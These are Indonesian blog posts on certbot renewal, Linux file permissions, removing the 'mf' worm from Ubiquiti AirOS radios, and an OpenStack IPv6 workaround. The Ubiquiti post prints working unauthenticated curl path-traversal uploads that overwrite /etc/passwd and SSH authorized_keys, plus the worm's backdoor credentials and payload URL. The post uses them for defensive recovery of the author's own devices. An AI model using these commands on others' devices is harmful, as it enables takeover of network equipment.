SSLCertificateKeyFile   /etc/letsencrypt/live/example.com/privekey.pem

Renewal

Untuk renewal, caranya sama dengan instalasi, hanya saja certonly diganti renew. Kemudian renew juga tidak perlu parameter --email dan --domain.
Misalnya:

certbot renew --standalone --agree-tos

Atau

certbot renew --apache --agree-tos

Untuk yang manual.

certbot renew --manual --agree-tos

Terkecuali untuk yang manual, renew bisa dieksekusi lewat cron supaya bisa renew certificate secara otomatis kalau sudah mendekati masa expire. Dan tidak seperti digital certificate yang mahal, certificate dari Let’s Encrypt ini umurnya pendek, cuma tiga bulan saja. Tapi karena renewal bisa diproses secara otomatis lewat cron saya rasa tidak ada bedanya.

Baik, sampai sini semoga tulisan ini bisa dipahami. Silahkan di-share, dikomentari dan dikoreksi kalau ada yang salah atau kurang.

Terima kasih.

Belajar Linux Dasar - File Permission

2016-07-24T00:00:00+08:00

Selamat pagi, siang, atau malam teman-teman Linuxers. Tulisan ini yang keempat seri pembelajaran Linux dasar, buat teman-teman yang belum baca tulisan sebelumnya, ini link-nya:

Yang keempat ini kita bakal belajar tentang permissions. Permission ini kurang lebih seperti cara mengatur siapa yang bisa berbuat apa di file tertentu. Satu orang cuma bisa baca saja, orang lainnya bisa baca sama edit file, dan sebagainya.

Buat memahami permission, paling tidak ada dua hal yang perlu kita pahami, yaitu pengelompokan user sama mode akses nya. Cara manipulasi permission dan penjelasan tentang SUID, SGID, dan Sticky bit juga ada di tulisan ini.

User, Group, dan Other.

Ada tiga jenis user di Unix dan Linux yang berhubungan dengan file permission; mereka itu User, Group, dan Other. Seperti apakah mereka? di bawah:

User
Ini user yang punya file atau pemilik file. Kalau misalnya saya buat file bernama “blah” pakai command touch blah, maka file blah ini punya Saya, kecuali kepemilikan atau ownership file ini dialihkan ke user lain pakai command chown.

Di Linux masing-masing user punya id yang unik. Kalau kita mau cek nama user kita yang lagi login, pakai command whoami.

whoami

Kalau mau cek nomor id user kita yang lagi login:

id -u $(whoami)

Untuk nama-nama user yang lain bisa dilihat di file /etc/passwd.

Group
Beberapa user bisa digabungkan ke dalam satu grup. Sama seperti User, Group ini masing-masing juga punya nama dan nomor id yang unik.

Nama-nama grup bisa dilihat di file /etc/group. Kalau kita mau lihat user yang kita pakai sekarang tergabung di grup mana saja, ketik command id.

Other
Kalau yang ini berlaku buat semua user yang bukan pemilik file, juga tidak tergabung dalam grup pemilik file.

Mode akses.

Berikutnya mode akses. Mode akses, atau permission ini yang menentukan hak akses masing-masing user yang sudah dijelaskan sebelumnya.
Setiap file, termasuk file direktori punya tiga mode akses seperti di bawah:

read. User yang punya akses read dia bisa melihat isi file atau melihat atribut file.
write. User yang punya akses write berarti dia bisa update, edit, rename, move dan hapus file.
execute. Mode akses yang ini biasanya cuma diterapkan ke file program atau script, file program atau script tidak bisa dieksekusi kalau tidak punya mode execute. Jadi user yang punya akses execute ke file, dia bisa mengeksekusi file program atau script itu.

Berikutnya coba kita lihat contoh output command ls -l

ls -l blah 
-rwxr-xr-- 1 administrator admins 0 Jul 19 13:45 blah

File blah di atas itu kepunyaan user administrator sama grup admins.
Permission-nya ada di kolom yang pertama, itu yang -rwxr-xr--.
bagaimana cara bacanya ini?

Keterangannya seperti ini:

1) File type
Karakter yang pertama itu menunjukkan jenis file, ada beberapa tipe seperti list di bawah:

- : Regular file atau gampangnya file biasa.
d : File direktori atau folder, seperti yang dibuat pakai command mkdir.
l : Menunjukkan file jenis link seperti yang dibuat pakai command ln -s.
b : Block device, seperti flash disk, partisi hard drive, dsb.
c : File character class seperti serial console.
s : File socket jenis Unix.

2) User permission
Permission ini berlaku buat pemilik file. Dalam contoh ini rwx yang berarti si user pemilik file bisa baca (r), edit, rename, move dan hapus (w), dan execute (x).

3) Group Permission
Permission yang ini berlaku buat grup pemilik file, grup ini isinya bisa nol user atau lebih. Di contoh, permission untuk grup r-x yang berarti para user yang tergabung di grup ini, mereka bisa baca (r) dan execute (x) tapi tidak bisa edit, rename, move atau hapus file karena grup ini tidak punya permission write (w).

4) Other Permission
Triad permission yang terakhir ini berlaku buat semua user selain nomor 2 dan nomor 3 di atas. Di contoh ini, para user yang tergolong other cuma bisa baca file karena cuma ada permission baca atau read (r).

Manipulasi Permission

Hak akses atau permission untuk ketiga jenis user; user, group, dan other itu tidak statik yang artinya permission ini bisa dirubah. Untuk merubah permission kita pakai command chmod.

Kalau mau rubah permission, kita bisa pilih salah satu dari dua mode chmod, mode text sama numeric.
Kita lihat satu-satu.

Mode text
Mode chmod yang ini pakai karakter huruf untuk masing-masing jenis user:

u : yang berarti user pemilik file.
g : grup pemilik file.
o : other.
a : semua user u, g, dan o. Kita bisa pakai a ini daripada harus ketik ugo.

Contoh untuk set permission grup supaya bisa baca, edit dan hapus file:

# chmod g=rw blah
# ls -l blah 
-rwxrw-r-- 1 administrator admins 0 Jul 19 13:45 blah

Supaya other tidak punya permission apa-apa, tidak bisa baca, edit dan execute:

# chmod o= blah
# ls -l blah 
-rwxrw---- 1 administrator admins 0 Jul 19 13:45 blah

User pemilik file dengan akses penuh:

# chmod u=rwx blah
# ls -l blah 
-rwxrw---- 1 administrator admins 0 Jul 19 13:45 blah

Semua user punya akses penuh:

# chmod ugo=rwx blah
# ls -l blah 
-rwxrwxrwx 1 administrator admins 0 Jul 19 13:45 blah

Selain ugo bisa juga pakai a untuk semua user.

# chmod a=rwx blah

Di mode ini, selain pakai tanda sama dengan (=), kita juga bisa pakai tanda minus (-) atau plus (+).
Misalnya kalau g=rwx itu berarti berikan hak akses penuh ke grup, g-w berarti hilangkan permission w dari grup. g+w berarti tambahkan permission write (w) ke grup.

Contoh, kita hilangkan permission w dan x dari group dan other.

# chmod go-wx blah
# ls -l blah
-rwxr--r-- 1 administrator admins 0 Jul 19 13:45 blah

Mode Numeric
Kalau mode yang ini kita tidak pakai huruf-huruf seperti u, g, atau o, tapi pakai angka oktal. Oktal? Bilangan yang angkanya cuma 8, dari 0 sampai 7.

Caranya begini, tiga permission r, w, dan x anggap saja seperti tiga kolom terus masing-masing kolom ini punya switch atau saklar on/off pakai bilangan biner yang bersifat boolean. Bilangan biner angkanya cuma 1 sama 0, 1 berarti hidup dan 0 berarti mati.

Contoh r-x berarti 101, rwx berarti 111, r-- berarti 100.
Angka 101 yang mewakili r-x itu bilangan biner, jadi angka 101 bukan berarti seratus satu, tapi 5 kalau dalam oktal.

chmod mode numeric pakai tiga angka oktal; angka pertama mewakili permission untuk user, angka kedua mewakili group, dan angka ketiga mewakili permission other.

Contoh untuk set permission jadi rwxr-xr-- :

# chmod 754 blah

command di atas kalau dalam mode text seperti ini :

# chmod u=rwx,g=rx,o=r blah

Saya rasa gambar lebih bisa menjelaskan mode numeric ini.

Gampangnya bisa kita ingat mode-mode permission-nya seperti ini :

r = 4, atau dalam biner ditulis 100.
w = 2, dalam biner ditulis 010.
x = 1, dalam biner ditulis 001.

Jadi rwx sama dengan 421 yang kalau angka-angka ini dijumlahkan sama dengan 7.
r-x berarti 401, dijumlahkan jadi 5. r-- berarti 400, ketiga angka ini dijumlahkan hasilnya 4.

Itulah kenapa 754 sama dengan rwxr-xr--

Contoh lain, mode 644 :

# chmod 644 blah
# ls -l blah
-rw-r--r-- 1 administrator admins 0 Jul 19 13:45 blah

Mode 644 dengan gambar.

Mode 777

# chmod 777 blah
# ls -l blah
-rwxrwxrwx 1 administrator admins 0 Jul 19 13:45 blah

Biar lebih gampang lagi, kita bisa lihat tabel di bawah:

chmod numeric	Oktal	Biner	Teks
`0`	`0+0+0`	`000`	`---`
`1`	`0+0+1`	`001`	`--x`
`2`	`0+2+0`	`010`	`-w-`
`3`	`0+2+1`	`011`	`-wx`
`4`	`4+0+0`	`100`	`r--`
`5`	`4+0+1`	`101`	`r-x`
`6`	`4+2+0`	`110`	`rw-`
`7`	`4+2+1`	`111`	`rwx`

Buat Saya, pakai numeric ini lebih ringkas daripada harus pakai u, g, atau o.

SUID, SGID, Sticky bit.

Pernah pakai command sudo? Ya, pakai command sudo kita bisa jalankan program pakai user lain, root misalnya.

SUID atau Set User ID ini kurang lebih seperti sudo tapi tanpa perlu pakai perintah sudo. SUID ini cuma bisa dipakai di file executable seperti file program. Artinya file program executable yang ada flag suid kalau dieksekusi, maka sistem Linux menjalankan prosesnya dengan user pemilik file, bukan user yang mengeksekusinya.

Contoh file /usr/bin/passwd.

ls -l /usr/bin/passwd
-rwsr-xr-x 1 root root 53112 Nov 20  2014 /usr/bin/passwd

Coba kita perhatikan di permission yang pertama (rws), karakter s menandakan SUID.
File itu punya user root dan dengan suid, siapapun bisa mengeksekusi file itu dan sistem akan menjalankannya dengan user root. Karena itu user reguler bisa mengganti passwordnya sendiri biarpun tidak punya akses write ke file /etc/passwd.

SGID atau Set Group ID kurang lebih seperti SUID hanya saja untuk group. Jadi program dengan sgid yang dijalankan oleh siapapun dianggap group yang mengeksekusinya.

ls -l /usr/bin/bsd-write 
-rwxr-sr-x 1 root tty 9680 Oct 18  2014 /usr/bin/bsd-write

Sama seperti SUID, karakter s menandakan sgid tapi di permission triad yang tengah.

Sticky bit ini berguna buat mencegah file dihapus oleh user yang bukan pemilik file, biarpun di dalam direktori publik yang open access.

Contohnya direktori /tmp. Direktori ini punya mode 777 yang artinya siapa saja punya akses penuh ke file-file yang ada di direktori ini, siapa saja bisa buat dan hapus file. Tapi kalau ada Sticky bit, file tidak bisa dihapus, move, atau rename begitu saja oleh sembarang user, cuma user pemilik dan user root saja yang bisa hapus, move, atau rename.

ls -ld /tmp
drwxrwxrwt 16 root root 4096 Jul 20 15:15 /tmp

Karakter pertama (d) menandakan file /tmp itu file direktori. Tiga karakter berikutnya (rwx) artinya user pemilik folder /tmp punya akses penuh. Tiga karakter berikutnya untuk group (rwx) yang juga berarti akses penuh. Terakhir (rwt) untuk Other yang berarti read, write, dan sticky bit. Jadi karakter t itu menandakan sticky bit.

Bagaimana set SUID, SGID atau Sticky bit?

Sama seperti setting permission hanya saja kita pakai 4 angka, angka pertama untuk suid, sgid, dan sticky bit, tiga angka berikutnya permission untuk user, group, dan other.

Angka oktal kurang lebih sama seperti permission rwx.

SUID : 4 atau dalam biner 100.
SGID : 2 atau dalam biner 010, dan.
Sticky bit : 1 atau 001 dalam angka biner.

Contoh untuk set suid dan permission 755 di file blah :

# chmod 4755 blah
# ls -l blah
-rwsr-xr-x 1 administrator admins 0 Jul 19 13:45 blah

Set SGID:

# chmod 2755 blah
# ls -l blah
-rwxr-sr-x 1 administrator admins 0 Jul 19 13:45 blah

Untuk Sticky bit:

# chmod 1755 blah
# ls -l blah
-rwxr-xr-t 1 administrator admins 0 Jul 19 13:45 blah

Kita bisa set dua flag atau lebih, misal suid + sgid yang berarti 4 + 2 = 6.

# chmod 6755 blah
# ls -l blah
-rwsr-sr-x 1 administrator admins 0 Jul 19 13:45 blah

Atau suid + sticky bit yang berarti 4 + 1 = 5.

# chmod 5755 blah
# ls -l blah
-rwsr-xr-t 1 administrator admins 0 Jul 19 13:45 blah

Selain mode numeric, kita juga bisa pakai mode text:

SUID : s.
SGID : s.
Sticky bit : t.

chmod u+s untuk set suid, chmod g+s untuk set sgid, dan chmod o+t untuk set sticky bit.

Merubah Ownership

Ownership, atau kepemilikan file baik user atau group bisa diganti atau dialihkan ke user atau group lain.

Untuk merubah user ownership pakai command chown. Contoh merubah kepemilikan file blah yang awalnya punya user administrator dialihkan ke user root.

# ls -l blah
rwx-r-xr-x 1 administrator admins 0 Jul 19 13:45 blah
# chown root blah
# ls -l blah
rwx-r-xr-x 1 root admins 0 Jul 19 13:45 blah

Untuk mengganti group kita pakai command chgrp. Contoh rubah group admins ke group root.

# chgrp root blah
# ls -l blah
rwx-r-xr-x 1 root root 0 Jul 19 13:45 blah

Kita juga bisa rubah user sama grupnya pakai satu command chown. Di bawah contoh buat rubah user ke administrator dan grup ke admins.

# chown administrator:admins blah
# ls -l blah
rwx-r-xr-x 1 administrator admins 0 Jul 19 13:45 blah

Jadi, user dan grup dipisahkan dengan titik dua (:).

Semua command di atas; chmod, chown, dan chgrp bisa juga dipakai di direktori secara recursive. Artinya kalau kita rubah satu direktori, semua file sama direktori yang ada di dalamnya semua ikut berubah tanpa perlu eksekusi command ke file satu per satu.

Untuk recursive pakai argumen -R. Contoh, supaya tidak ada yang bisa baca isi folder Documents selain yang punya.

chmod -R 600 Documents

Dengan -R semua file dan folder termasuk isinya semua permission-nya berubah.

Baik, semoga tulisan tentang Linux file permission ini bisa dipahami dengan mudah.
Silahkan dikomentari, kritik, share, atau abaikan.

Terima kasih.

Virus Ubiquiti v5.5.x error "Invalid Credentials"

2016-06-08T14:35:00+08:00

Beberapa hari lalu kami dibuat pusing karena tiba-tiba saja banyak perangkat radio Ubiquiti tidak bisa diakses. Kalau coba login ke perangkat-perangkat itu muncul pesan error “Invalid Credentials” yang berarti username atau password tidak valid.

Tidak ada satu pun manusia yang merubah password. Lagi pula perangkat yang error itu jumlahnya banyak, jadi kecil kemungkinan password dirubah secara manual dengan waktu yang hampir bersamaan. Karena itu dugaan saya pertama kali ini pasti lewat scripting.

Barangkali di antara rekan-rekan ada yang juga mengalami hal ini, ini karena virus yang menamakan dirinya mf (motherfu**er), nama virus yang sama sekali tidak keren. Ciri-cirinya, sebagian kasus halaman login web bisa dibuka tapi gagal login. Sebagian kasus lainnya halaman login web tidak bisa dibuka tapi perangkat router atau radio itu reply kalau di-ping. untuk yang terakhir ini akses cuma bisa lewat ssh.

Normalnya, kalau username dan password perangkat sudah berubah dan tidak bisa diakses lagi, berarti harus reset ke konfigurasi default. Ini yang buat saya agak sedikit horor karena banyaknya jumlah perangkat radio yang harus direset. Untungnya cara ini tidak perlu diambil.

Saya kemudian coba cari-cari di database bug Ubiquiti AirMAX barangkali ada bug AirOS yang jadi sumber malapetaka ini. Benar saja, di HackerOne ada bug yang tergolong baru dan bug ini bisa dieksploitasi untuk bypass autentikasi.

Sebelumnya kalau rekan-rekan ada yang belum tahu AirOS, ini OS embedded untuk perangkat jaringan (Radio dan router) Ubiquiti. OS ini pakai kernel Linux yang dibuat dari OpenWRT.

Bug ini karena tidak adanya boundscheck untuk verifikasi user input lewat webserver lighttpd. Attacker bisa eksploitasi bug ini dengan upload file tanpa autentikasi. Parahnya lagi, file yang diupload itu bisa ditempatkan di mana saja karena punya hak akses root.

Bayangkan saja kalau yang diupload itu ssh public key atau file passwd. File passwd bisa buat overwrite file /etc/passwd, si attacker bisa login tanpa perlu autentikasi. Apa bukan mimpi buruk ini namanya, heh?

Saya lihat log bug ini di HackerOne, penemu bug ini dapat ganjaran 18.000 dolar dari Ubiquiti, whew…!
Ubiquiti kemudian menutup bug ini di AirOS versi 5.6.2.

Kembali ke virus motherfucker yang mengeksploitasi bug ini.

Apa yang dilakukan virus ini?

Virus ini di awal-awal akan download virus dari http://pastebin.com/raw/heNFjBVK terus extract virus mf.tgz ke direktori /etc/persistent terus buat direktori hidden /etc/persistent/.mf. Virus ini kemudian menghapus user ubnt, mengganti file /etc/passwd dengan file passwd versi virus.

Ada user baru di passwd dengan nama user moth3r dan password hash $1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK1. Belakangan diketahui password hash itu fuck.3r, seseorang di belahan bumi yang lain berhasil brut force hash itu pakai John the Ripper.

Selanjutnya virus ini merubah mode wireless ke master, mengganti ssid, disable dhcp server, dan disable tombol reset. Untungnya semua itu gagal, jadi tidak ada yang terubah.

Virus ini menyebar dengan melihat ip neighbor dan menyebar ke perangkat yang bertetangga dengan perangkat yang terinfeksi itu.

Siapa yang vulnerable dengan virus ini? mereka adalah perangkat radio atau router Ubiquiti AirMAX yang pakai OS dibawah 5.6.2.

Cara hapus virus

Cara paling gampang kalau bisa login ssh ke router pakai username moth3r dan password fuck.3r. Dari sini hapus direktori /etc/persistent/.mf sama /etc/persistent/rc.poststart.

for i in $(ps | grep mf | awk '{print $1}' | sed 's/ //'); do kill $i; done
rm -rf /etc/persistent/.mf
rm -f /etc/persistent/rc.poststart
cfgmtd -w -f /tmp/system.cfg -p /etc/
reboot

Masalahnya, ada sebagian perangkat yang user dan password itu invalid. Jadi kita tidak tahu apa passwordnya, jadi kita harus cari cara yang lain.

Kita bisa login kembali ke perangkat Ubiquiti itu dengan cara yang sama yang dipakai exploit. saya pakai file passwd sama file ssh public key.

1) user di file passwd
Kita bisa pakai file passwd dari mana saja. Yang di bawah ini juga bisa dipakai.

blah:Ddc96rtq5NYfG:0:0:Administrator:/etc/persistent:/bin/sh
ubnt:IXpEhRnqWrjjI:100:100:Administrator:/etc/persistent:/bin/false

Tidak penting apa passwordnya karena nantinya kita login pakai ssh key.

2) Buat ssh key
Ssh key bisa dibuat pakai command ssh-keygen, passphrase kosong saja biar nantinya bisa login tanpa password.

Endor > ssh-keygen -t rsa -C "blah@blah.com"
Generating public/private rsa key pair.
Enter file in which to save the key (/home/user/.ssh/id_rsa): blah_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in blah_rsa.
Your public key has been saved in blah_rsa.pub.
The key fingerprint is:
ff:98:31:3b:3b:ec:70:8f:3c:34:6b:09:e0:2b:f4:d6 blah@blah.com
The key's randomart image is:
+---[RSA 2048]----+
|                 |
|                 |
|                 |
|      .          |
|     . .S        |
|    . . ..o      |
|   . . o.+=+     |
|    . + E+OX     |
|     o   oO=o    |
+-----------------+
Endor >

3) Upload file passwd dan ssh public key
Di sini bug itu, kita bisa seenaknya upload file terus tempatkan file itu di mana saja tanpa perlu autentikasi. Fatal kan?

curl -F "file=@passwd;filename=../../etc/passwd" -H "Expect:" "https://192.168.1.20/login.cgi" -k
curl -F "file=@blah_rsa.pub;filename=../../etc/dropbear/authorized_keys" -H "Expect:" "https://192.168.1.20/login.cgi" -k

Ip address 192.168.1.20 itu contoh saja.

Kemudian coba login ssh

ssh -i blah_rsa blah@192.168.1.20

Saya berhasil login pakai ssh key, fiuhh..!! rasanya lega sekali.

4) Hapus virus
Sebelum hapus virus, kita harus kill dulu semua proses yang ada hubungannya sama mf.

for i in $(ps | grep mf | awk '{print $1}' | sed 's/ //'); do kill $i; done
rm -rf /etc/persistent/.mf
rm -f /etc/persistent/rc.poststart

Masih di shell Ubiquiti, kembalikan password ke default

/usr/bin/sed -i 's/users\.1\.password=.*/users\.1\.password=35YnFRwmUdGzc/' /tmp/system.cfg
cfgmtd -w -f /tmp/system.cfg -p /etc/
reboot

Lokasi sed kalau di Ubiquiti AirOS memang di /usr/bin/sed, beda sama kebanyakan Linux yang sed nya ada di /bin/sed.

Setelah selesai reboot, kita bisa login ke router pakai password default “ubnt” terus upgrade ke firmware yang baru.

Selain di atas, ada cara lain lagi yang bisa diambil.
Virus ini awal-awal masuk ke router, dia bakalan download curl dari http://downloads.openwrt.org dan http://bo.mirror.garr.it/mirrors/openwrt. Kita bisa buat file curl palsu yang isinya script buat hapus virus. Jadi waktu virus itu coba download curl dari openwrt.org, kita alihkan supaya download dari web server lokal yang isinya file curl palsu. Begitu virus ini eksekusi curl, yang ada bukannya menginfeksi tetangganya tapi malah bunuh diri.

Virus ini sudah mendunia, di forum Ubiquiti ada yang mengaku punya ribuan perangkat yang terinfeksi dalam semalam saja. saya membayangkannya saja seperti mimpi buruk, apalagi mengalaminya. Saran, kalau teman-teman punya Ubiquiti dengan firmware dibawah 5.6.2 dan belum kena, segera saja upgrade ke firmware baru.

Info:
Tulisan ini salah satu sumbernya saya ambil dari situs www.exploit-db.com. IDWebhost yang jadi hosting provider blog ini ternyata punya policy tidak boleh nge-link ke situs yang ada kata “exploit”.

Saya chatting panjang kali lebar dengan support IDWebhost karena begitu tulisan ini online malah tidak bisa diakses dengan kode 404, ternyata penyebabnya karena link itu.

Jadi source-nya yang untuk exploit-db sedikit saya sensor. Rubah https://www.exploxx-db.com/exploxxx/39853/ ke https://www.exploit-db.com/exploits/39853/.

Source:

Cerita lainnya:
“Hampir” Semua Tentang IPv6
Tulisan tentang IPv6 yang berusaha komprehensif tapi ternyata gagal membahas semua hal tentang IPv6. “Hampir” Semua Tentang IPv6, dari sejarah, kelebihan IPv6, sampai pengalamatannya.

Membumikan OpenStack
This is a story about How I Met ~~Your Mother~~ OpenStack, ditulis dengan Layman’s term.

Solusi IPv6 di OpenStack Icehouse

2016-06-02T10:13:00+08:00

OpenStack yang pertama kali saya install pakai Debian 8, dan seperti anak kecil yang dapat mainan baru, Saya begitu excited sama OpenStack ini.
Icehouse, ini versi OpenStack yang default di Debian Jessie, versi OpenStack yang sebenarnya dirilis tahun 2014 lalu dan sekarang sudah masuk masa EOL atau End of Life.

Budaya di Debian Stable memang begitu, lebih mengutamakan kestabilan daripada keterbaruan. saya yang pertama kalinya menginstall OpenStack Icehouse di Debian 8 merasakan itu, Saya tidak banyak menemui masalah waktu instalasi.

Semua komponen OpenStack sudah running; Keystone, Nova, Cinder, Glance, dan Neutron semuanya sudah jalan. Kemudian saya buat vm, install OS Debian di vm itu terus migrasi konfigurasi dari server yang lama. Selanjutnya, Saya buat virtual router dan setup networking IPv4 buat guest OS, semuanya lancar jaya tidak ada masalah.

Lalu problem itu muncul waktu saya coba setting koneksi IPv6, OpenStack Neutron tidak bisa buat external network pakai IPv6 padahal untuk internal network tidak ada masalah.
Berikutnya saya menghabiskan berjam-jam buat Googling dan berujung satu kesimpulan, OpenStack versi Icehouse ini belum sepenuhnya mendukung IPv6.

Saya seperti nabrak dinding dan sedikit frustasi. Penyebabnya karena pertama, proses instalasi ini sudah terlanjur jauh dan tinggal satu potongan puzzle saja yang tidak bisa, IPv6 itu. Kedua, koneksi IPv6 ini penting karena sebelumnya para server ini juga sudah pakai IPv6 waktu masih pakai Xen. Jadi bagaimanapun caranya, para server itu harus punya koneksi IPv6.

Saya punya tiga pilihan. Pertama uninstall OpenStack dan kembali ke Xen, yang ini tidak saya ambil. Kedua, baca kode Python OpenStack Neutron, cari tahu masalahnya di mana dan perbaiki. Cara kedua ini berat, Saya terlalu hebat kalau bisa memahami kode Neutron dalam satu atau dua hari. Tinggal pilihan ketiga, pelajari bagaimana cara kerja OpenStack Neutron dan lihat barangkali ada workaround yang bisa diambil.

Pilihan ketiga saya ambil dan dua hari berikutnya Saya habiskan buat baca dokumentasi, Googling, sama utak-atik OpenStack. Begitu sudah paham cara kerja OpenStack Neutron, solusinya ternyata simpel, gampang dan agak konyol. Cuma tinggal tambah IP address sama tambah route ke routing table, sudah beres.

Karena saya belum paham kode OpenStack Neutron jadi Saya juga tidak paham penyebab masalah IPv6 ini, tapi mungkin saja karena desain networking yang dipakai.

OpenStack punya istilah-istilah yang menurut saya aneh untuk IP addressing, ada yang namanya floating IP sama fixed IP. Floating IP ini IP address yang dipakai buat komunikasi guest OS dengan external network seperti Internet misalnya, floating IP ini bisa berubah-ubah dan biasanya floating IP ini IP address publik.

Kalau fixed IP, ini IP address yang fix dipakai di guest OS, IP address yang ini tidak bakal berubah dan biasanya ini jenis IP address private.

Dengan setup seperti di gambar itu, satu floating IP dipetakan ke satu fixed IP pakai NAT. Jadi untuk akses ke guest OS dari network luar, yang diakses floating IP-nya bukan yang fixed IP. NAT yang kemudian meneruskan paket IP ke fixed IP yang dipakai guest OS.

Begitu juga kalau guest OS ke external network seperti Internet misalnya, IP address yang fixed IP itu diterjemahkan ke floating IP oleh NAT, jadi yang kelihatan dari Internet bukan yang fixed IP tapi yang floating IP.

Dengan desain network yang seperti itu, kelihatan sekali kalau network itu buat IPv4. Kalau desain seperti ini dibuat IPv6 bakalan tidak bisa, karena di IPv6 tidak ada lagi yang namanya NAT. Di IPv6 kita punya 3,4x10³⁸ IP address, jadi kita tidak perlu lagi NAT.

Kalau IPv6 dan NAT ini masih asing buat Anda, saya sudah tulis artikel tentang IPv6 dengan judul “Hampir” Semua Tentang IPv6. Silahkan dibaca, artikel ini mungkin saja bisa sedikit mencerahkan tentang IPv6.

Sudah cukup, sekarang solusinya bagaimana?

Salah satu dari dua opsi bisa diambil.
Pertama, dengan mengeliminasi virtual router dan menggantikannya pakai router fisik.

Dengan begini, external network langsung di-attach ke guest OS dan IP address public bisa langsung di-set di guest OS. Dengan cara ini, kemungkinan juga firewall perlu disesuaikan.

Buat saya sayangnya, Saya sudah terlanjur pakai virtual router untuk IPv4 dan merubah topologi itu ke cara pertama berarti Saya harus setup networking dari awal lagi. Saya cari cara yang lain saja.

Cara kedua, ugly workaround.

Cara yang kedua ini tetap pakai virtual router seperti di gambar yang pertama, hanya saja saya menambahkan IPv6 address termasuk route nya ke virtual router.

Kalau Anda belum ngeh apa itu Linux namespace, ada baiknya baca ini dulu Cara Kerja OpenStack Networking - Memahami Network Namespace karena virtual router OpenStack pakai Linux namespace.

Lanjut, karena koneksi IPv4 di OpenStack ini sudah jalan, berarti saya sudah punya virtual router termasuk interface-nya.

root@Controller:~# ip netns show
qrouter-3b71f8b1-4f6f-4647-abd3-bac4b1aebe7d
root@Controller:~# ip netns exec qrouter-3b71f8b1-4f6f-4647-abd3-bac4b1aebe7d ip link show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
7: qg-25efe5e5-07: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN mode DEFAULT group default 
    link/ether fa:16:3e:84:ca:5c brd ff:ff:ff:ff:ff:ff
9: qr-6d6d8407-22: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN mode DEFAULT group default 
    link/ether fa:16:3e:7f:a5:23 brd ff:ff:ff:ff:ff:ff
10: qr-cadd47a6-a2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN mode DEFAULT group default 
    link/ether fa:16:3e:c9:b5:47 brd ff:ff:ff:ff:ff:ff
12: qr-c5ad4b75-f0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN mode DEFAULT group default 
    link/ether fa:16:3e:69:23:ee brd ff:ff:ff:ff:ff:ff
root@Controller:~#

Keterangan namespace dan port seperti di bawah:

qrouter-3b71f8b1-4f6f-4647-abd3-bac4b1aebe7d. Ini nama namespace untuk virtual router yang dipakai. Kalau ada lebih dari satu router, namespace juga lebih dari satu.
lo. Interface loopback di virtual router.
qg-25efe5e5-07. Interface yang terkoneksi ke external network, sebut saja WAN.
qr-6d6d8407-22. Interface yang terkoneksi ke internal network 1, atau LAN 1 untuk IPv4.
qr-cadd47a6-a2. Interface internal network 2, LAN 2 buat IPv4.
qr-c5ad4b75-f0. Interface internal network buat IPv6.

Cara buat dual-stack IPv4 dan IPv6 di virtual router itu gampang saja.

Tambahkan IPv6 address di interface qg-25efe5e5-07.
Tambahkan default route IPv6 di router qrouter-3b71f8b1-4f6f-4647-abd3-bac4b1aebe7d.
Tambahkan route di router fisik, entah dynamic atau static route terserah saja.

Untuk network IPv6 IP address-nya saya rubah, kita anggap saja untuk link inter-router pakai prefix 2001:db8:dead::/64 dengan 2001:db8:dead::1 di router fisik dan 2001:db8:dead::2 di qg-25efe5e5-07.

Untuk network guest OS, prefix anggap saja 2001:db8:cafe::/64, IPv6 address di interface qr-c5ad4b75-f0 kita pakai 2001:db8:cafe::1.

Gambarannya seperti di bawah:

Langkah-langkahnya seperti ini,
Pertama, Tambahkan IPv6 address di port qg-25efe5e5-07.

root@Controller:~# ip netns \
> exec qrouter-3b71f8b1-4f6f-4647-abd3-bac4b1aebe7d \
> ip -6 addr add 2001:db8:dead::2/64 dev qg-25efe5e5-07
root@Controller:~#

Kedua, default route di virtual router.

root@Controller:~# ip netns \
> exec qrouter-3b71f8b1-4f6f-4647-abd3-bac4b1aebe7d \
> ip -6 route add default via 2001:db8:dead::1
root@Controller:~#
root@Controller:~# ip netns \
> exec qrouter-3b71f8b1-4f6f-4647-abd3-bac4b1aebe7d \
> ip -6 route show
2001:db8:dead::/64 dev qg-25efe5e5-07  proto kernel  metric 256 
2001:db8:cafe::/64 dev qr-c5ad4b75-f0  proto kernel  metric 256 
fe80::/64 dev qr-6d6d8407-22  proto kernel  metric 256 
fe80::/64 dev qr-c5ad4b75-f0  proto kernel  metric 256 
fe80::/64 dev qr-cadd47a6-a2  proto kernel  metric 256 
fe80::/64 dev qg-25efe5e5-07  proto kernel  metric 256 
default via 2001:db8:dead::1 dev qg-25efe5e5-07  metric 1024
root@Controller:~#

Ketiga, tambahkan route 2002:db8:cafe::/64 di router fisik .
Ini tergantung OS routernya, misalnya untuk router yang pakai OS Linux.

ip -6 route add 2001:db8:cafe::/64 via 2001:db8:dead::2

Vyatta dan VyOS.

user@ROUTER:~$ configure
user@ROUTER:~# set protocols static route6 2001:db8:cafe::/64 next-hop 2001:db8:dead::2
user@ROUTER:~# commit

MikroTik RouterOS.

/ipv6 route add dst-address=2001:db8:cafe::/64 gateway=2001:db8:dead::2

Cisco IOS dan Quagga.

ipv6 route 2001:db8:cafe::/64 2001:db8:dead::2

Setelah selesai ini kemudian saya coba koneksi IPv6 dari server guest OS.

IPv6 berhasil..! saya terselamatkan.

Dengan script, hidup jadi lebih mudah

Kalau misalnya saja nantinya server perlu reboot, saya tidak harus mengulang command-command di atas. Jadi Saya ketik sedikit Shell script buat sedikit mengurangi beban hidup.

Waktu itu saya belum tahu apa nantinya nama namespace sama nama interfacenya ini bisa berubah atau tidak kalau reboot, jadi namespace sama nama interfacenya Saya buat dinamis. Kemudian setelah benar-benar reboot baru Saya tahu nama-namanya tidak ada yang berubah, tapi karena sudah terlanjur diketik jadi Saya paste saja di sini.

IPv6 address-nya juga saya rubah jadi 2001:db8:dead::/64 sama 2001:db8:cafe::/64 sesuai gambar yang di atas.

